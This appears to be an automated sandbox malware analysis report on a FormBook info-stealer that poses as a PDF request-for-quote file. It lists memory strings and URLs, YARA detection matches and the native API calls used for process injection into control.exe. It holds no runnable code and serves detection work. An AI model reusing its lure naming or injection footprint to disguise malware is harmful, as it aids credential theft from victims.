          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: http://business.google.com/website/rooted-with-love/pe0r/&quot;
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.660312730.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/localservices
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: https://business.google.com
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: https://lh5.googleusercontent.com/tnT1qBMzmyLgRDNYg3gq78quEpuZVERk849E090SPkl3uZ90NtOdF0DdK28eDthwrR
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: https://rootedwithlovejax.com
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: https://schema.org/LocalBusiness
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: https://workspace.google.com
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/maps/dir//Rooted
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/_/mss/boq-geo/_/js/k=boq-geo.GeoMerchantPrestoSiteUi.en_US.H3HiHVucosI.es5.O
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EA0

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_004181B0 NtCreateFile,2_2_004181B0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00418260 NtReadFile,2_2_00418260
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_004182E0 NtClose,2_2_004182E0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00418390 NtAllocateVirtualMemory,2_2_00418390
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_004182DC NtClose,2_2_004182DC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_00A098F0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk,2_2_00A09860
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09840 NtDelayExecution,LdrInitializeThunk,2_2_00A09840
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A099A0 NtCreateSection,LdrInitializeThunk,2_2_00A099A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00A09910
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09A20 NtResumeThread,LdrInitializeThunk,2_2_00A09A20
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00A09A00
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09A50 NtCreateFile,LdrInitializeThunk,2_2_00A09A50
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A095D0 NtClose,LdrInitializeThunk,2_2_00A095D0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09540 NtReadFile,LdrInitializeThunk,2_2_00A09540
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00A096E0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00A09660
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00A097A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09780 NtMapViewOfSection,LdrInitializeThunk,2_2_00A09780
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09FE0 NtCreateMutant,LdrInitializeThunk,2_2_00A09FE0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09710 NtQueryInformationToken,LdrInitializeThunk,2_2_00A09710
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A098A0 NtWriteVirtualMemory,2_2_00A098A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09820 NtEnumerateKey,2_2_00A09820
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A0B040 NtSuspendThread,2_2_00A0B040
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A099D0 NtCreateProcessEx,2_2_00A099D0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09950 NtQueueApcThread,2_2_00A09950
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09A80 NtOpenDirectoryObject,2_2_00A09A80
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09A10 NtQuerySection,2_2_00A09A10
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A0A3B0 NtGetContextThread,2_2_00A0A3B0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09B00 NtSetValueKey,2_2_00A09B00
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A095F0 NtQueryInformationFile,2_2_00A095F0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09520 NtWaitForSingleObject,2_2_00A09520
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A0AD30 NtSetContextThread,2_2_00A0AD30
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09560 NtWriteFile,2_2_00A09560
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A096D0 NtCreateKey,2_2_00A096D0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09610 NtEnumerateValueKey,2_2_00A09610
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09670 NtQueryInformationProcess,2_2_00A09670
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09650 NtQueryValueKey,2_2_00A09650
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09730 NtQueryVirtualMemory,2_2_00A09730
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A0A710 NtOpenProcessToken,2_2_00A0A710
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09760 NtOpenProcess,2_2_00A09760
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09770 NtSetInformationFile,2_2_00A09770
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A0A770 NtOpenThread,2_2_00A0A770
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9540 NtReadFile,LdrInitializeThunk,7_2_047D9540
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D95D0 NtClose,LdrInitializeThunk,7_2_047D95D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_047D9660
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9650 NtQueryValueKey,LdrInitializeThunk,7_2_047D9650
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_047D96E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D96D0 NtCreateKey,LdrInitializeThunk,7_2_047D96D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9710 NtQueryInformationToken,LdrInitializeThunk,7_2_047D9710
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9FE0 NtCreateMutant,LdrInitializeThunk,7_2_047D9FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9780 NtMapViewOfSection,LdrInitializeThunk,7_2_047D9780
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_047D9860
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9840 NtDelayExecution,LdrInitializeThunk,7_2_047D9840
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_047D9910
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D99A0 NtCreateSection,LdrInitializeThunk,7_2_047D99A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9A50 NtCreateFile,LdrInitializeThunk,7_2_047D9A50
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9560 NtWriteFile,7_2_047D9560
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047DAD30 NtSetContextThread,7_2_047DAD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9520 NtWaitForSingleObject,7_2_047D9520
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D95F0 NtQueryInformationFile,7_2_047D95F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9670 NtQueryInformationProcess,7_2_047D9670
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9610 NtEnumerateValueKey,7_2_047D9610
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047DA770 NtOpenThread,7_2_047DA770
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9770 NtSetInformationFile,7_2_047D9770
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9760 NtOpenProcess,7_2_047D9760
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9730 NtQueryVirtualMemory,7_2_047D9730
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047DA710 NtOpenProcessToken,7_2_047DA710
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D97A0 NtUnmapViewOfSection,7_2_047D97A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047DB040 NtSuspendThread,7_2_047DB040
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9820 NtEnumerateKey,7_2_047D9820
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D98F0 NtReadVirtualMemory,7_2_047D98F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D98A0 NtWriteVirtualMemory,7_2_047D98A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9950 NtQueueApcThread,7_2_047D9950
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D99D0 NtCreateProcessEx,7_2_047D99D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9A20 NtResumeThread,7_2_047D9A20
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9A10 NtQuerySection,7_2_047D9A10
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9A00 NtProtectVirtualMemory,7_2_047D9A00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9A80 NtOpenDirectoryObject,7_2_047D9A80
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9B00 NtSetValueKey,7_2_047D9B00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047DA3B0 NtGetContextThread,7_2_047DA3B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_007181B0 NtCreateFile,7_2_007181B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00718260 NtReadFile,7_2_00718260
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_007182E0 NtClose,7_2_007182E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00718390 NtAllocateVirtualMemory,7_2_00718390
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_007182DC NtClose,7_2_007182DC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040314A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_004046A70_2_004046A7
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00408C4B2_2_00408C4B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00408C502_2_00408C50
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041BD8E2_2_0041BD8E
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041C5A12_2_0041C5A1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041B5A12_2_0041B5A1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A920A82_2_00A920A8
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DB0902_2_009DB090
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F20A02_2_009F20A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A928EC2_2_00A928EC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9E8242_2_00A9E824
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A810022_2_00A81002
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CF9002_2_009CF900
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E41202_2_009E4120
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A922AE2_2_00A922AE
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7FA2B2_2_00A7FA2B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FEBB02_2_009FEBB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A803DA2_2_00A803DA
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8DBD22_2_00A8DBD2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A92B282_2_00A92B28
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAB402_2_009EAB40
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D841F2_2_009D841F
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8D4662_2_00A8D466
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F25812_2_009F2581
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A925DD2_2_00A925DD
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DD5E02_2_009DD5E0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A92D072_2_00A92D07
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C0D202_2_009C0D20
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A91D552_2_00A91D55
